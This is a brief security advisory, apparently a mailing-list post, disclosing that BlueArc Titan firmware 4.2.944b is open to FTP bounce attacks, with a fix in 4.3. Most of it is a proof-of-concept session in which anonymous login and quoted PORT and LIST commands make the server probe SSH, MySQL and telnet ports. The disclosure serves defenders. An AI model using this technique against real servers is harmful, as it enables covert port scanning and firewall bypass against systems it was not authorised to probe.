
BlueArc Firmware 4.2.944b FTP bounce



Hi all,

BlueArc Titan 2x00 devices running firmware version 4.2.944b are
susceptible to FTP bounce attacks. The vendor has confirmed this, and
a fix is available in the 4.3 firmware.

Example: in the session below, the FTP server is first directed to
connect to SSH (success), then to MySQL (no success), then to telnet
(no success).

[user@localhost ~]$ ftp bluearctitan
Connected to bluearctitan.
220 Server ready (BlueArc-FTPD v1.0)
Name (bluearctitan:user): anonymous
331 Username okay; need password
Password:
230 User logged in, proceed
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "PORT xxx,xxx,xxx,xxx,0,22"
200 PORT Command Okay
ftp> quote "LIST"
150 File status okay; about to open data connection
226 Transfer Complete
ftp> quote "PORT xxx,xxx,xxx,xxx,12,234"
200 PORT Command Okay
ftp> quote "LIST"
150 File status okay; about to open data connection
425 Can't open data connection (dtp_list)
ftp> quote "PORT xxx,xxx,xxx,xxx,0,23"
200 PORT Command Okay
ftp> quote "LIST"
150 File status okay; about to open data connection
425 Can't open data connection (dtp_list)
